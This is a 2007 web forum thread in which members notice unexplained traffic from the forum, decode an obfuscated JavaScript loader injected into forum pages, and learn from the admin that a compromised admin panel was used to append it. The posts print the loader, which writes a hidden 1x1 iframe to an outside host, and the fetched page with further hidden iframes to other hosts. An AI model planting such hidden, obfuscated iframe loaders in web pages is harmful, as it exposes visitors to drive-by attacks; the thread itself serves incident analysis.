| View previous topic :: View next topic |
| Author |
Message |
Traffic
Guest
|
 Posted: Thu Nov 08, 2007 11:56 pm Post subject: Is this traffic normal? |
 |
|
I noticed that ,browsing this forum I am also geting traffic to/from these hosts:
redtram-ru.narod.ru
www.tns-counter.ru
Is it normal?? |
|
| Back to top |
|
 |
Trikster
Joined: 15 Jul 2007
Posts: 1224
Location: Enterprise, Alabama
|
| Posted: Fri Nov 09, 2007 12:25 am Post subject: |
|
|
| Either you have a virus, or Chris has a web-hit counter installed on the forum. (Well, according to the URL I would lean on the second.) |
|
| Back to top |
|
|
Lexikos
Joined: 17 Oct 2006
Posts: 2739
Location: Australia, Qld
|
| Posted: Fri Nov 09, 2007 1:03 am Post subject: |
|
|
| I see redtram-ru.narod.ru in my DNS cache. It leads to a 403 error page... |
|
| Back to top |
|
|
Traffic
Guest
|
| Posted: Fri Nov 09, 2007 1:17 am Post subject: |
|
|
Interesting thing is that when it only happens whenI am browsing this forum.
There is another url:
-http://redtram-ru.narod.ru/21.js |
|
| Back to top |
|
|
BoBoЁ
Guest
|
| Posted: Fri Nov 09, 2007 6:52 am Post subject: |
|
|
That's 21.js ... | Code: | function newn(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47
!47!114!101!100!116!114!97!109!45!114!117!46!110!97!114!111!100!46!114
!117!47!105!110!100!46!104!116!109!108!32!119!105!100!116!104!61!49!32
!104!101!105!103!104!116!61!49!32!102!114!97!109!101!98!111!114!100!101
!114!61!48!32!115!116!121!108!101!61!39!100!105!115!112!108!97!121!58
!110!111!110!101!39!62!60!47!105!102!114!97!109!101!62!"; l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+
str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}
document.write(out);} newn(); |
|
|
| Back to top |
|
|
Lexikos
Joined: 17 Oct 2006
Posts: 2739
Location: Australia, Qld
|
| Posted: Fri Nov 09, 2007 12:11 pm Post subject: |
|
|
Now wth would anyone write a .js file just to cover up the output of... | Code: | <iframe src=http://redtram-ru.narod.ru/ind.html width=1 height=1 frameborder=0 style='display:none'></iframe>
|
...especially when the only thing on that page ("o_0") is "underconstruction."
It seems to me that none of this should be here. It also seems completely harmless & pointless.  |
|
| Back to top |
|
|
Traffic
Guest
|
| Posted: Fri Nov 09, 2007 12:52 pm Post subject: |
|
|
Well, it seems wierd to me too.
I was wondering if it somehow was causing the problems I have to access the forum sometimes |
|
| Back to top |
|
|
jballi
Joined: 01 Oct 2005
Posts: 385
Location: Texas, USA
|
| Posted: Tue Nov 13, 2007 10:19 pm Post subject: |
|
|
| One of my anti-malware programs (don't know which one) has identified redtram-ru.narod.ru as a restricted site. I'm just wondered if there is any additional information on the reason this forum is accessing this site/counter/etc? |
|
| Back to top |
|
|
engunneer
Joined: 30 Aug 2005
Posts: 6847
Location: Pacific Northwest, US
|
| Posted: Tue Nov 13, 2007 10:20 pm Post subject: |
|
|
I checked on two computers - it is not in my DNS cache, I think
how are you checking?
_________________
 Unless otherwise noted, all code is untested.
Common Answers: 1.(Loops, Viruses, etc.) 2. Search 3.RTFM |
|
| Back to top |
|
|
jballi
Joined: 01 Oct 2005
Posts: 385
Location: Texas, USA
|
| Posted: Tue Nov 13, 2007 10:43 pm Post subject: |
|
|
| engunneer wrote: | I checked on two computers - it is not in my DNS cache, I think
how are you checking? |
One of my anti-malware programs loaded the web site to the list of restricted web sites. When using IE and on the main AHK forum page I can pull up this report:
This is just something I noticed today. It may have been there for a while. |
|
| Back to top |
|
|
ahklerner
Joined: 26 Jun 2006
Posts: 1249
Location: USA
|
| Posted: Tue Nov 13, 2007 10:52 pm Post subject: |
|
|
firebug on firefox is how I see it.
it is only affecting the index pages(go to the forum index)
| Code: | function newn(){var temp="",i,c=0,out="";var
str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116
!112!58!47!47!114!101!100!116!114!97!109!45!114!117!46!110!
97!114!111!100!46!114!117!47!105!110!100!46!104!116!109!108
!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61
!49!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115
!116!121!108!101!61!39!100!105!115!112!108!97!121!58!110!111
!110!101!39!62!60!47!105!102!114!97!109!101!62!";
l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')
temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);
temp="";}document.write(out);} newn();
|
| Code: |
// <script language="javascript">
2on=mw=null;
3fl=ofl=0;
4mc=me=0;
5t=0;
6b=0;
7ch=bt=bn=0;
8wn=wt=null;
9sl=0;
10t2=0;
11function Is25B857C6()
12{
13 this.n=(document.layers)?true:false;
14 this.o=(navigator.userAgent.indexOf('Opera')!=-1)?true:false;
15 this.i=(document.all&&(!this.o))?true:false;
16 this.d=(document.getElementById)?true:false;
17}
18var is25B857C6=new Is25B857C6();
19function Stor()
20{
21 if(is25B857C6.n&&(top.frames.length>0)){
22 return top.frames[0];
23 }
24 else{
25 if (document.location.search.substring(0,6)=="?Time=") return self;
26 return top;
27 }
28
29}
30var st=Stor();
31if(isNaN(st.sl)) st.sl=1; else st.sl++;
32function ge25B857C6()
33{
34 var cl;
35 if(is25B857C6.n){
36 cl=document.layers[ge25B857C6.arguments[0]];
37 for(var i=1;i<ge25B857C6.arguments.length&&cl;i++) {
38 cl=cl.document.layers[ge25B857C6.arguments[i]];
39 }
40 return cl;
41 } else if(is25B857C6.i) {
42 cl=eval('document.all.'+ge25B857C6.arguments[ge25B857C6.arguments.length-1]);
43 return cl;
44 } else {
45 var n=ge25B857C6.arguments[ge25B857C6.arguments.length-1];
46 cl=document.getElementById(n);
47 if(cl) return cl;
48 cl=document.getElementsByName(n);
49 if(cl) return cl[0];
50 }
51}
52function sbv25B857C6(v)
53{
54 if(is25B857C6.n) st.b.visibility=v;
55 else if(st.b.style) st.b.style.visibility=v;
56}
57function met25B857C6(e,x,y)
58{
59 if(is25B857C6.n) e.moveTo(x,y);
60 else if(is25B857C6.i) {
61 e.style.pixelLeft=x;
62 e.style.pixelTop=y;
63 } else {
64 e.style.left=x;
65 e.style.top=y;
66 }
67}
68function gbw25B857C6(e)
69{
70 if(is25B857C6.n) return e.document.width;
71 else return e.offsetWidth;
72}
73function gbo25B857C6(e)
74{
75 var y;
76 if(is25B857C6.n) return e.pageY;
77 else {
78 y = 0;
79 while (e.offsetParent != null) {
80 y += e.offsetTop;
81 e = e.offsetParent;
82 }
83 y += e.offsetTop;
84 return y;
85 }
86}
87function gww25B857C6()
88{
89 if(window.innerWidth) return window.innerWidth;
90 else return document.body.clientWidth;
91}
92function gwh25B857C6()
93{
94 if(window.innerHeight) return window.innerHeight;
95 else return document.body.clientWidth;
96}
97function rbu25B857C6()
98{
99 if(st.b==st.bn){
100 sbv25B857C6('hidden');
101 st.b=st.bt;
102 sbv25B857C6('visible');
103 }
104 clearTimeout(st.t);
105}
106function rbd25B857C6()
107{
108 if(st.b==st.bt){
109 sbv25B857C6('hidden');
110 st.b=st.bn;
111 sbv25B857C6('visible');
112 }
113 clearTimeout(st.t);
114}
115function clb25B857C6()
116{
117 clearTimeout(st.t);
118 sbv25B857C6('hidden');
119}
120function gn25B857C6(n,c) {
121if (is25B857C6.n) {
122document.write('<layer id="'+n+'" left=0 top=0 visibility=hide z-index=999>')
123} else {
124document.write('<div style="position: absolute; left: 0; top: 0;'+(is25B857C6.i?" width: 1;":"")+' visibility: hidden; z-index: 999;" id="'+n+'">');
125}
126document.write('<table cellpadding=1 cellspacing=0 border=0 width="108"><tr><td bgcolor=000000><table cellpadding=0 cellspacing=0 border=0 width=100%><tr bgcolor=ffffff><td height=1 nowrap><spacer type=block width=1 height=1></td></tr><tr><td><table cellpadding=0 cellspacing=0 border=0 width="100%"><tr bgcolor=cccccc><td width=1 nowrap bgcolor=ffffff><spacer type=block width=1 height=1></td><td width=18><a href="http://www.yandex.ru/" target=_blank><img src="http://bs.yandex.ru/resource/by.gif" title="Яндекс" alt="Яндекс" width=18 height=14 border=0 vspace=2 hspace=1></a></td><td width="98%"><a href="http://www.yandex.ru/advertising/index.html" target=_blank><img src="http://bs.yandex.ru/resource/bt.gif" title="Реклама на Яндексе" alt="Реклама на Яндексе" width=51 height=14 border=0 align=middle></a></td><td width=11><a href="http://narod.yandex.ru/help/mini.yhtml" target=_blank><img src="http://bs.yandex.ru/resource/bh.gif" title="Помощь" alt="Помощь" width=11 height=10 border=0></a></td><td width=11>');
127if (n=='bn') {
128document.write('<a href="#" onclick="rbu25B857C6(); return false;"><img src="http://bs.yandex.ru/resource/bu.gif" title="Спрятать" alt="Спрятать" width=11 height=10 border=0></a>');
129} else {
130document.write('<a href="#" onclick="rbd25B857C6(); return false;"><img src="http://bs.yandex.ru/resource/bd.gif" title="Показать" alt="Показать" width=11 height=10 border=0></a></td><td width=11><a href="#" onclick="clb25B857C6();return false;"><img src="http://bs.yandex.ru/resource/bc.gif" title="Закрыть" alt="Закрыть" width=11 height=10 border=0></a>');
131}
132document.write('</td><td width=1 nowrap bgcolor=808080><spacer type=block width=1 height=1></td></tr></table></td></tr><tr><td><table cellpadding=0 cellspacing=0 border=0 width="100%"><tr bgcolor=cccccc><td width=3><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td><td width="100%" bgcolor=808080><spacer type=block width=1 height=1></td><td width=3><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td></tr><tr bgcolor=cccccc><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td><td width="100%">'+c+'</td><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td></tr><tr><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td><td height=1 bgcolor=ffffff><spacer type=block width=1 height=1></td><td width=3 background="http://bs.yandex.ru/resource/bb.gif"><img src="http://bs.yandex.ru/resource/bb.gif" width=3 height=1></td></tr></table></td></tr><tr bgcolor=cccccc><td height=1 nowrap><table cellpadding=0 cellspacing=0 border=0 width=1 align=left><td height=1 nowrap bgcolor=ffffff><spacer type=block width=1 height=1></td></table><table cellpadding=0 cellspacing=0 border=0 width=1 align=right><td height=1 nowrap bgcolor=808080><spacer type=block width=1 height=1></td></table></td></tr><tr bgcolor=808080><td height=1 nowrap><spacer type=block width=1 height=1></td></tr></table></td></tr></table>');
133if (is25B857C6.n) document.writeln('</layer>');
134else document.writeln('</div>');
135}
136function mvb25B857C6()
137{
138 var obn=0;
139 var obt=0;
140 if(bn==0) bn=ge25B857C6('bn');
141 if(bt==0) bt=ge25B857C6('bt');
142 if(ch==0) ch=ge25B857C6('ch');
143 if(!wn) wn=gbw25B857C6(bn);
144 if(!wt) wt=gbw25B857C6(bt);
145 w=gww25B857C6();
146 h=gwh25B857C6();
147 o=gbo25B857C6(ch);
148 obn=w-wn;
149 obt=w-wt;
150 if((!is25B857C6.i) && h<o) {
151 obn -= 15;
152 obt -= 15;
153 }
154 met25B857C6(bn,obn,0);
155 met25B857C6(bt,obt,0);
156}
157function shb25B857C6()
158{
159 if((self!=st.mw)&&(top.frames.length>0)) return;
160 mvb25B857C6();
161 st.bt = bt; st.b = st.bn = bn;
162 sbv25B857C6('visible');
163 st.t=setTimeout('rbu25B857C6()',30000);
164 if(on) {
165 sv=st;
166 on();
167 st=sv;
168 }
169}
170function isl25B857C6()
171{
172 if(st.sl==0) {
173 if(st.mw==self) {
174 if(st.b) sbv25B857C6('hidden');
175 shb25B857C6();
176 }
177 clearTimeout(t2);
178 } else {
179 ofl=st.fl;
180 t2=self.setTimeout('self.isl25B857C6()',100);
181 }
182}
183function net25B857C6(s) {
184 if(s>st.mc){
185 st.mc=s;
186 st.mw=self;
187 isl25B857C6();
188 }
189}
190function rbf25B857C6()
191{
192 if (wc != window.innerWidth || hc != window.innerHeight) document.location.reload();
193}
194fn = frames.length;
195if(fn>0){
196 e=document.getElementsByTagName('iframe');
197 if(is25B857C6.d) fn-=e.length;
198}
199if(fn==0) {
200 if (is25B857C6.n) {
201 document.write('<layer id="ch" left=0 visibility=hide><spacer type=block width=1 height=1></layer>');
202 }
203 else {
204 document.write('<div style="position: absolute; left: 0; visibility: hidden;" id="ch"><spacer type=block width=1 height=1></div>');
205 }
206 gn25B857C6('bn', '<a href="http://bs.yandex.ru/count/9RXNnXyf3Ga30BlAA3f7QnIYCCenoZ7ZGAhacHt739r4PinKhkU8b49_0m00" target=_blank title="Мы помогаем вам помогать. http://www.wse-wmeste.ru/"><img src="http://bs.yandex.ru/count/9RXNnj1Vt_u30BlAA3f7QnIYCCenoZ7ZGAhacHt739r4PinKhkY8b45_0m00" alt="Мы помогаем вам помогать. http://www.wse-wmeste.ru/" width="100" height="100" border="0"></a>');
207 gn25B857C6('bt', '<a href="http://bs.yandex.ru/count/9RXNnXyf3Ga30BlAA3f7QnIYCCenoZ7ZGAhacHt739r4PinKhkU8b49_0m00" target=_blank><font size=-2 color="#000000">Мы помогаем вам помогать. http://www.wse-wmeste.ru/</font></a>');
208 if(is25B857C6.n) {
209 wc=window.innerWidth;
210 hc=window.innerHeight;
211 window.onResize=rbf25B857C6;
212 }
213 else if(is25B857C6.i) {
214 window.onresize=mvb25B857C6;
215 }
216 else {
217 addEventListener("resize",mvb25B857C6,false);
218 }
219 if(is25B857C6.i) {
220 if(st.fl==null) {
221 st.fl=0;
222 st.mw=null;
223 st.mc=0;
224 }
225 } else {
226 if(isNaN(st.fl)) {
227 st.fl=0;
228 st.mw=null;
229 st.mc=0;
230 }
231 }
232 if(top.frames.length>0) {
233 me=st.fl++;
234 x=gww25B857C6();
235 y=gwh25B857C6();
236 s=x*y;
237 if(x>120&&y>120&&s>st.mc) {
238 if(st.mc==0) setTimeout('self.net25B857C6('+s+')',x/10);
239 else {
240 st.mc=s;
241 st.mw=self;
242 isl25B857C6();
243 }
244 }
245 st.sl--;
246 }
247 else {
248 if(window.onload) on=window.onload;
249 window.onload=shb25B857C6;
250 }
251}
252// </script> |
| Code: | <html>
2<head>
3<title>o_O</title>
4<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
5</head>
6<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
7
8<!-- <iframe src="http://81.95.149.236/us4/index.php" width=1 height=1 frameborder="0" style="display:none"></iframe>
9<!-- <iframe src="http://client133.faster-hosting.com/movie74.php?user=hlo" width=1 height=1 frameborder="0" style="display:none"></iframe> -->
10<!-- <iframe src="" width=1 height=1 frameborder="0" style="display:none"></iframe>
11<!-- <iframe src="" width=1 height=1 frameborder="0" style="display:none"></iframe> -->
12
13undercontruction!
14
15<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
16<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
17<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
18<!--LiveInternet counter--><script type="text/javascript"><!--
19document.write("<a href='http://www.liveinternet.ru/click' "+
20"target=_blank><img src='http://counter.yadro.ru/hit?t28.13;r"+
21escape(document.referrer)+((typeof(screen)=="undefined")?"":
22";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
23screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
24";"+Math.random()+
25"' alt='' title='LiveInternet: показано количество просмотров и"+
26" посетителей' "+
27"border=0 width=88 height=120><\/a>")//--></script><!--/LiveInternet-->
28</body>
29</html><!-- ><!-- "><!-- '><!-- --></textarea></form>
30</title></comment></a>
31</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
32<style>
33#bn {display:block;}
34#bt {display:block;}
35</style>
36<div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
37<script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
38<!-- mailto:spm111@yandex.ru -->
|
Edit: Fixed my code width
_________________
ʞɔпɟ əɥʇ ʇɐɥʍ
Last edited by ahklerner on Wed Nov 14, 2007 12:49 am; edited 1 time in total |
|
| Back to top |
|
|
Lexikos
Joined: 17 Oct 2006
Posts: 2739
Location: Australia, Qld
|
| Posted: Tue Nov 13, 2007 11:56 pm Post subject: |
|
|
| engunneer wrote: | I checked on two computers - it is not in my DNS cache, I think
how are you checking? |
ipconfig /displaydns |
|
| Back to top |
|
|
Titan
Joined: 11 Aug 2004
Posts: 5390
Location: /b/
|
| Posted: Wed Nov 14, 2007 12:08 am Post subject: |
|
|
Looks like the forum has been infected, I remember that a similar incident happened a while ago.
_________________
 |
|
| Back to top |
|
|
Traffic
Guest
|
| Posted: Wed Nov 14, 2007 12:10 am Post subject: |
|
|
| Well, while we do not know if this activitie is "official" or not, I think that the best thing to do is to block it. |
|
| Back to top |
|
|
Chris
Site Admin
Joined: 02 Mar 2004
Posts: 10480
|
| Posted: Wed Nov 14, 2007 12:18 am Post subject: |
|
|
It appears the forum's built-in admin panel was accessed and one of the forum descriptions was altered to append this JavaScript. It has been removed.
This probably happened in conjunction with the security problem a couple months ago that was mentioned in this topic. But as a precaution (in case it happened more recently), I've changed the passwords again.
Can anyone determine whether the JavaScript was harmful vs. harmless? Hopefully it's not another Quicktime exploit that infects your PC with a trojan. |
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Register
Profile
Log in to check your private messages
Log in
